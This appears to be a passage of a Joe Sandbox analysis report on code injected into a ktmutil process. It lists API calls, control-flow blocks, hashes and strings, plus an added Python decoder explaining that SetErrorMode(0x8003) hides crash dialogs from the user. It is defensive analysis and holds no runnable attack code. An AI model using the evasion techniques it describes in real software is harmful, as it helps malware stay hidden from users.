                                                                          • Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c58b1d28f7d8c38ccc00cbc4a76da1268782df48a96b6692224138bb0ff47c59
                                                                          • Instruction ID: 406dafb7c250783c2e6267ef5da8c2eceb7ca79303b94b74b46cc4481e3d40e5
                                                                          • Opcode Fuzzy Hash: c58b1d28f7d8c38ccc00cbc4a76da1268782df48a96b6692224138bb0ff47c59
                                                                          • Instruction Fuzzy Hash: 2A90022525555502D150B25C44846564006A7E0301F95C021A0814998D865989556221

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,028D1E70,028E812F,028E57EE,028D1E3D), ref: 028D8273
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID: 6$O$S$\$s
                                                                          • API String ID: 2340568224-3854637164
                                                                          • Opcode ID: b72d2c1f748663960c741968c7166302356d5f212e34cd27ab021486547b8256
                                                                          • Instruction ID: 93aa025b15d3152fca2d36a1aee927a06b411a943cb2f688cd48fbf0f37ea5be
                                                                          • Opcode Fuzzy Hash: b72d2c1f748663960c741968c7166302356d5f212e34cd27ab021486547b8256
                                                                          • Instruction Fuzzy Hash: BF41E4BAD00118ABDF10EF98DC49BEEB3B9EF40318F0441A9ED0DD6141E7759A598BE1
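
The two resolved calls in this region, SetErrorMode(00008003) above and PostThreadMessageW(..., 00000111, ...) in the 28d0e4d / 28d0ee9 entries further down, are printed with raw hex arguments. The Python below is an added example, not Joe Sandbox code, that parses API lines in the form the report prints them and expands the constants from the Windows SDK headers: 0x8003 is SEM_FAILCRITICALERRORS | SEM_NOGPFAULTERRORBOX | SEM_NOOPENFILEERRORBOX, which silences critical-error, crash (Windows Error Reporting) and open-file dialogs so that a fault in the injected code does not put a window in front of the user, and 0x111 is WM_COMMAND. The two sample lines are copied from this page; the flag tables are limited to the constants relevant here and the line format is assumed from the listing.

```python
"""Decode the hex API-call arguments that Joe Sandbox prints in function entries.

Added example for this report; it is not Joe Sandbox's own code. Constant
values come from the Windows SDK headers (winbase.h, winuser.h).
"""
import re

# Constructed sample: the two resolved API calls shown in this listing.
SAMPLE_LINES = [
    "SetErrorMode.KERNELBASE(00008003,?,?,028D1E70,028E812F,028E57EE,028D1E3D), ref: 028D8273",
    "PostThreadMessageW.USER32(7438m-J24,00000111,00000000,00000000), ref: 028D0F6D",
]

# SetErrorMode flags (winbase.h)
SEM_FLAGS = {
    0x0001: "SEM_FAILCRITICALERRORS",
    0x0002: "SEM_NOGPFAULTERRORBOX",
    0x0004: "SEM_NOALIGNMENTFAULTEXCEPT",
    0x8000: "SEM_NOOPENFILEERRORBOX",
}

# Window messages of interest (winuser.h); 0x0111 is WM_COMMAND
WM_NAMES = {0x0010: "WM_CLOSE", 0x0012: "WM_QUIT", 0x0111: "WM_COMMAND"}

# Line layout as the report prints it: Api.Module(arg,arg,...), ref: ADDR
LINE_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")


def parse_call(line):
    """Split one API line into api, module, argument list and call-site address.

    Arguments the plugin could not resolve are '?', and arguments it resolved
    as strings (here '7438m-J24') are kept verbatim; only all-hex tokens are
    converted to integers.
    """
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError("not a Joe Sandbox API line: %r" % line)
    args = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        if tok and re.fullmatch(r"[0-9A-Fa-f]+", tok):
            args.append(int(tok, 16))
        else:
            args.append(tok)  # '?' or a string-resolved argument
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def decode_flags(value, table):
    """Expand a bitmask into names from `table`; bits not in the table stay as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return names


def annotate(call):
    """Return human-readable notes for the two call types this report shows."""
    notes = []
    if call["api"] == "SetErrorMode" and isinstance(call["args"][0], int):
        mode = call["args"][0]
        notes.append("SetErrorMode(%s)" % " | ".join(decode_flags(mode, SEM_FLAGS)))
        if mode & 0x0002:
            notes.append("suppresses the Windows Error Reporting dialog on crash")
    elif call["api"] == "PostThreadMessageW" and isinstance(call["args"][1], int):
        msg = call["args"][1]
        notes.append("PostThreadMessageW(thread=%r, msg=%s, wParam=%r, lParam=%r)" % (
            call["args"][0], WM_NAMES.get(msg, hex(msg)), call["args"][2], call["args"][3]))
    return notes


def annotate_lines(lines):
    """Map each API name to its decoded notes."""
    out = {}
    for line in lines:
        call = parse_call(line)
        out[call["api"]] = annotate(call)
    return out


if __name__ == "__main__":
    for api, notes in annotate_lines(SAMPLE_LINES).items():
        print(api, "->", "; ".join(notes))
```

The first PostThreadMessageW argument is left as the string the plugin resolved it to; the report lists the same string under the entry's String ID, so the thread identifier was not recoverable as a number from the dump.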

Control-flow Graph (the rendered graph and its executed / not-executed colouring were not preserved; the basic blocks and edges below are what survives)
• 173: 28d0e4d-28d0e4e -> 174, 175
• 174: 28d0e50-28d0e5a -> 177, 178
• 175: 28d0e92-28d0ed0 -> 179, 180
• 177: 28d0e5c -> 175
• 178: 28d0e42-28d0e4b -> 173, 181
• 179: 28d0f00-28d0f5e, calls 28eb6d0, 28ec0e0, 28d4650, 28c1410, 28e1d50 -> 193, 194
• 180: 28d0ed2-28d0ee7 (no outgoing edge listed)
• 181: 28d0e1d-28d0e3a -> 178
• 193: 28d0f80-28d0f85 (no outgoing edge listed)
• 194: 28d0f60-28d0f71, PostThreadMessageW -> 193, 195
• 195: 28d0f73-28d0f7d -> 193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 0-3908258731
                                                                          • Opcode ID: fb8d70d64d6cde8a36ce0eb32f01734a64750901c322100b92a227c048b10c64
                                                                          • Instruction ID: d66b3efd78f463edf2752d114d924f4d21dd9bdb226c7dfd2e4a4ade5f4bdee7
                                                                          • Opcode Fuzzy Hash: fb8d70d64d6cde8a36ce0eb32f01734a64750901c322100b92a227c048b10c64
                                                                          • Instruction Fuzzy Hash: 8E31BD39E412896BDB129B74DC01BCEBB74EF42724F18829AE914EF5C1C334540ACBD1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 196 28d0ee9-28d0eea 197 28d0eec-28d0eff 196->197 198 28d0e9f-28d0ed0 196->198 201 28d0f00-28d0f5e call 28eb6d0 call 28ec0e0 call 28d4650 call 28c1410 call 28e1d50 197->201 198->201 202 28d0ed2-28d0ee7 198->202 213 28d0f80-28d0f85 201->213 214 28d0f60-28d0f71 PostThreadMessageW 201->214 214->213 215 28d0f73-28d0f7d 214->215 215->213
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7438m-J24,00000111,00000000,00000000), ref: 028D0F6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 1836367815-3908258731
                                                                          • Opcode ID: baf26b661c2cec8a3370a92062a33898e168868e86431754ca21920a973eba91
                                                                          • Instruction ID: 28f643fd73ac042e01c8f6f4b6acc7f7e16e4271e65568ea9d5844882ee701ae
                                                                          • Opcode Fuzzy Hash: baf26b661c2cec8a3370a92062a33898e168868e86431754ca21920a973eba91
                                                                          • Instruction Fuzzy Hash: F4216879E412487ADB219AA49C01FDEBB78EF42764F088255FA14EB6C1D27065068BE2

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(7438m-J24,00000111,00000000,00000000), ref: 028D0F6D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID: 7438m-J24$7438m-J24
                                                                          • API String ID: 1836367815-3908258731
                                                                          • Opcode ID: cb7c5c24bba79fb8926feaa9f34bdfc46b53a7b9119e670e21555ba31417ba40
                                                                          • Instruction ID: 602fb38473824122aeee20ce3c7bd8e2825ea7bfbc2f87d25c2f99a678e2e066
                                                                          • Opcode Fuzzy Hash: cb7c5c24bba79fb8926feaa9f34bdfc46b53a7b9119e670e21555ba31417ba40
                                                                          • Instruction Fuzzy Hash: 83012279E41208B6EB21AB948C01FDF7B7C9F41B54F108055FA04BB2C1D7B4A6068BE6

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 231 28e3a70-28e3abf 234 28e3ac2-28e3ad3 231->234 235 28e3ad8-28e3aee 234->235 236 28e3b2a-28e3b50 235->236 237 28e3af0-28e3afb 235->237 239 28e3b23 236->239 237->235 238 28e3afd-28e3b21 237->238 238->239 239->234 240 28e3b25 239->240 241 28e3b26-28e3b27 240->241 242 28e3b75-28e3b87 240->242 241->236 243 28e3b59-28e3b73 242->243 244 28e3b89-28e3b92 242->244 243->242 246 28e3b94-28e3b95 244->246 247 28e3be6-28e3be8 246->247 248 28e3b97 246->248 247->246 251 28e3bea-28e3bf0 247->251 249 28e3b99-28e3ba8 248->249 250 28e3c16-28e3c48 call 28eb5a0 248->250 255 28e3bcd-28e3bcf 249->255 256 28e3baa-28e3baf 249->256 257 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 250->257 258 28e3d54-28e3d5a 250->258 259 28e3bc8-28e3bca 255->259 260 28e3bd1-28e3be5 255->260 269 28e3cd0-28e3ce4 Sleep 257->269 259->255 260->247 270 28e3ce6-28e3cf8 269->270 271 28e3d45-28e3d4c 269->271 272 28e3d1a-28e3d32 270->272 273 28e3cfa-28e3d18 call 28e60b0 270->273 271->269 274 28e3d4e 271->274 275 28e3d38-28e3d3b 272->275 276 28e3d33 call 28e6150 272->276 273->275 274->258 275->271 276->275
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 0-1269752229
                                                                          • Opcode ID: 10dc8790ff7b4fcc61a02b35218861c4b0d30ba0ba794bc0b3a5582a787dc690
                                                                          • Instruction ID: e4282bc9b1f8558fcf75a2ac73e22aa4d02eaff9f735cdef0d6cb9948c3a8a73
                                                                          • Opcode Fuzzy Hash: 10dc8790ff7b4fcc61a02b35218861c4b0d30ba0ba794bc0b3a5582a787dc690
                                                                          • Instruction Fuzzy Hash: 2271AD79604746ABDF21DF28C880BFABBB4FF86310F54059ED55A9B281D3309946CBD1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 279 28e3c00-28e3c35 280 28e3c41-28e3c48 279->280 281 28e3c3c call 28eb5a0 279->281 282 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 280->282 283 28e3d54-28e3d5a 280->283 281->280 292 28e3cd0-28e3ce4 Sleep 282->292 293 28e3ce6-28e3cf8 292->293 294 28e3d45-28e3d4c 292->294 295 28e3d1a-28e3d32 293->295 296 28e3cfa-28e3d18 call 28e60b0 293->296 294->292 297 28e3d4e 294->297 298 28e3d38-28e3d3b 295->298 299 28e3d33 call 28e6150 295->299 296->298 297->283 298->294 299->298
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 342617ec5039f70802c1a6f300264fcff30f55f544d7508cead31da7ab62e113
                                                                          • Instruction ID: bb07be952baf9d056789fb9ddcedf836db4a33f5d00bdc9440f6f00aea62f031
                                                                          • Opcode Fuzzy Hash: 342617ec5039f70802c1a6f300264fcff30f55f544d7508cead31da7ab62e113
                                                                          • Instruction Fuzzy Hash: 863172B9601605BBDB14DF64CC81FEBBBB9EB89704F14455DF61E9B240D370AA40CBA1

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 302 28e3bf8-28e3c35 304 28e3c41-28e3c48 302->304 305 28e3c3c call 28eb5a0 302->305 306 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 304->306 307 28e3d54-28e3d5a 304->307 305->304 316 28e3cd0-28e3ce4 Sleep 306->316 317 28e3ce6-28e3cf8 316->317 318 28e3d45-28e3d4c 316->318 319 28e3d1a-28e3d32 317->319 320 28e3cfa-28e3d18 call 28e60b0 317->320 318->316 321 28e3d4e 318->321 322 28e3d38-28e3d3b 319->322 323 28e3d33 call 28e6150 319->323 320->322 321->307 322->318 323->322
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 46f91610b8cf44bb5da95720275f5d4d0eb52e6f8a09d3c446b8f738d058006c
                                                                          • Instruction ID: 4d6e7195245b752bc137eae0fab0bc58de59394d790151a05cb157e062d5a28e
                                                                          • Opcode Fuzzy Hash: 46f91610b8cf44bb5da95720275f5d4d0eb52e6f8a09d3c446b8f738d058006c
                                                                          • Instruction Fuzzy Hash: 8931A4B8A01705BBDB14DF64CC81FEBBBB9FB45304F144559EA1EAB240D374AA40CB91

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 326 28e3bf2-28e3c35 328 28e3c41-28e3c48 326->328 329 28e3c3c call 28eb5a0 326->329 330 28e3c4e-28e3cc8 call 28eb680 call 28d4650 call 28c1410 call 28e1d50 328->330 331 28e3d54-28e3d5a 328->331 329->328 340 28e3cd0-28e3ce4 Sleep 330->340 341 28e3ce6-28e3cf8 340->341 342 28e3d45-28e3d4c 340->342 343 28e3d1a-28e3d32 341->343 344 28e3cfa-28e3d18 call 28e60b0 341->344 342->340 345 28e3d4e 342->345 346 28e3d38-28e3d3b 343->346 347 28e3d33 call 28e6150 343->347 344->346 345->331 346->342 347->346
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 028E3CDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID: net.dll$wininet.dll
                                                                          • API String ID: 3472027048-1269752229
                                                                          • Opcode ID: 779382c2c7d36872cbb9d6305712a5d743868e9a3c22e136e49d9df40dddf251
                                                                          • Instruction ID: dc8a96d39a6039ed98b91f74e9e917aea5de88efc29df313059464ec06d5923b
                                                                          • Opcode Fuzzy Hash: 779382c2c7d36872cbb9d6305712a5d743868e9a3c22e136e49d9df40dddf251
                                                                          • Instruction Fuzzy Hash: EE319EB8A01605ABDB14DF64C880BFBBBB5FB85304F148559E61EAB240D374AA80CF91
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7925a7f1a9edda3ae31af877a790327190ff6439a13d207011e06b013ef9105
                                                                          • Instruction ID: 612ce5b1bfebc6b5731a923476ef3ede8e0985afdc742045525b2aed43775079
                                                                          • Opcode Fuzzy Hash: a7925a7f1a9edda3ae31af877a790327190ff6439a13d207011e06b013ef9105
                                                                          • Instruction Fuzzy Hash: AF41A8BEE4010C6BDF10CAE8DC82FEAB7B8DB42314F144698ED59CB241E631D8558B81
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028D46C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2ecc584568fcd9ac5dc1418675d0c4bb44afe3f298f8f2a2a2aba008d92e6909
                                                                          • Instruction ID: 4dae5c073d24329722482fb40118940dd18bc92bd8581585a8220d14846001b4
                                                                          • Opcode Fuzzy Hash: 2ecc584568fcd9ac5dc1418675d0c4bb44afe3f298f8f2a2a2aba008d92e6909
                                                                          • Instruction Fuzzy Hash: C9015EBDD0020DABDF10EBE4EC41F9DB7B89B04308F0045A5E919D7241F631E7188B92
                                                                          APIs
                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 028D46C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Load
                                                                          • String ID:
                                                                          • API String ID: 2234796835-0
                                                                          • Opcode ID: 2a8d48649bf1682a7b95131fede5f816520d383ba6ddb35d9a95bb367f1c7966
                                                                          • Instruction ID: 3dea2a1e7cd85221b11f9b0273ad87da5241f9a014560a16f1d3d06ad3688a7e
                                                                          • Opcode Fuzzy Hash: 2a8d48649bf1682a7b95131fede5f816520d383ba6ddb35d9a95bb367f1c7966
                                                                          • Instruction Fuzzy Hash: 0B01D47DD4120EBBDF10DBA4DC41FD8BBB89B44708F0041D9EC0CCA141E231A7488B92
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028C9E85
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 5eb34b7d135d341b89e67e4cd042e1c91de9a9ca9d643107c86f4f94cf54cfc6
                                                                          • Instruction ID: 6150f4d4d4ea15d19c162fbe94ff63bb92ec00a63ef516696e75f4870a5bcf78
                                                                          • Opcode Fuzzy Hash: 5eb34b7d135d341b89e67e4cd042e1c91de9a9ca9d643107c86f4f94cf54cfc6
                                                                          • Instruction Fuzzy Hash: FDF0E53B38030436E62065ED9C02FDBB78D8B81B61F200025F70CEB1C0DAA2F80046A5
                                                                          APIs
                                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 028C9E85
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateThread
                                                                          • String ID:
                                                                          • API String ID: 2422867632-0
                                                                          • Opcode ID: 4130ea286ae78d20c001ba41e5c8f28ddd55b37959682d63fdfdca20f3ad660d
                                                                          • Instruction ID: 89e4019746990f2fa82f5f50967f32b086f00128c48dd8b4cd0181998d7c1dca
                                                                          • Opcode Fuzzy Hash: 4130ea286ae78d20c001ba41e5c8f28ddd55b37959682d63fdfdca20f3ad660d
                                                                          • Instruction Fuzzy Hash: 8EF02B3F38030076E230A6A88C06FC7625D8F91B51F244058F20DEB2C0D6A2B44187A5
                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4241C045,00000007,00000000,00000004,00000000,028D3F38,000000F4), ref: 028E98DC
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: 1b65c6ac63d06a20780f0cdcde3fda65b0f20cf36ec7bb49ff8255cbba53373b
                                                                          • Instruction ID: 03a772ac148bb43599f97de43b57d78c5ed61e194907352361015c1b633a25fd
                                                                          • Opcode Fuzzy Hash: 1b65c6ac63d06a20780f0cdcde3fda65b0f20cf36ec7bb49ff8255cbba53373b
                                                                          • Instruction Fuzzy Hash: C0E039B92002047BCA14EE58DC85EDB33ADEFC9710F004418F908A7241C670F9108AB9
                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(028D1B79,?,028E5974,028D1B79,028E57EE,028E5974,?,028D1B79,028E57EE,00001000,?,?,00000000), ref: 028E988F
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: f764058ac5db65d08bddf75ddaae8083e0ef3ce045775ffc38545c6e4d667ad3
                                                                          • Instruction ID: 75b04ad9faca2917e2231a5114770ced1eed3837b201f7830054b567269dd378
                                                                          • Opcode Fuzzy Hash: f764058ac5db65d08bddf75ddaae8083e0ef3ce045775ffc38545c6e4d667ad3
                                                                          • Instruction Fuzzy Hash: 68E06D792007047BD614EE59DC55F9B33ADDFC9714F008408F908A7241CB70B9108BB5
                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008003,?,?,028D1E70,028E812F,028E57EE,028D1E3D), ref: 028D8273
                                                                          Memory Dump Source
                                                                          • Source File: 00000009.00000002.2646269298.00000000028C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_9_2_28c0000_ktmutil.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ErrorMode
                                                                          • String ID:
                                                                          • API String ID: 2340568224-0
                                                                          • Opcode ID: 4d5aa44c268ffbb41c953c86651dc3f38137473802a283b4e6576fe0464bbd1d
                                                                          • Instruction ID: b73aef0ff18f7488a66bcf4bc35cc581aaa0f6bc5ef50ddfae3eaff4901c6a52
                                                                          • Opcode Fuzzy Hash: 4d5aa44c268ffbb41c953c86651dc3f38137473802a283b4e6576fe0464bbd1d
                                                                          • Instruction Fuzzy Hash: 36D05E7A3803083BFA00E6B98C0AF5A368E5B04754F158468BA0CDB2C2EA65F8018666

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
• Instruction ID: 699a533d1b23b4b733d89062f9e889e927318caf2a26338d16f6583c372ac7b1
• Opcode Fuzzy Hash: 4adab6d9ce5cd26c5290c1335142a5dae7492745007c339d3c2897f492f23255
• Instruction Fuzzy Hash: 0AB09B719015C5C5DA11F7644A48717790567D0701F59C461D3034645E473DC1D1E175

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
• Instruction ID: 01a02ea5670d7c8590c05c56ab31527f458cd3ad3d67d14d3859eaba1d90497a
• Opcode Fuzzy Hash: ce988888a268b14dd04c2eed85da2b5b366b868ba12eb108fc93aeff074d0c1c
• Instruction Fuzzy Hash: 7051C6B6A04616BFCB20DB9C8CD097FF7BCFB09201B188569E4A5D7641D238DE54CBA0

Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
• Associated: 00000009.00000002.2647332323.0000000003429000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000342D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000009.00000002.2647332323.000000000349E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_3300000_ktmutil.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
• API String ID: 48624451-2108815105
• Opcode ID: 881b5ac1e41a7bd9b2e176d06a5c5cd5773ee0308719791e0d8c364096438dc3
• Instruction ID: 1266a089647a08dcd666df0a6c874a2761e112597b562285a1418e2f707352d3
• Opcode Fuzzy Hash: 881b5ac1e41a7bd9b2e176d06a5c5cd5773ee0308719791e0d8c364096438dc3
• Instruction Fuzzy Hash: 0E51E6B5A04665AECB24EF5CCDD097FFBFDAB44200B048859E4A6D76C1D774EA408B60

Strings
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 033A4742
• CLIENT(ntdll): Processing section info %ws..., xrefs: 033A4787
• Execute=1, xrefs: 033A4713
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033A46FC
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 033A4655
• ExecuteOptions, xrefs: 033A46A0
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 033A4725
Memory Dump Source
• Source File: 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
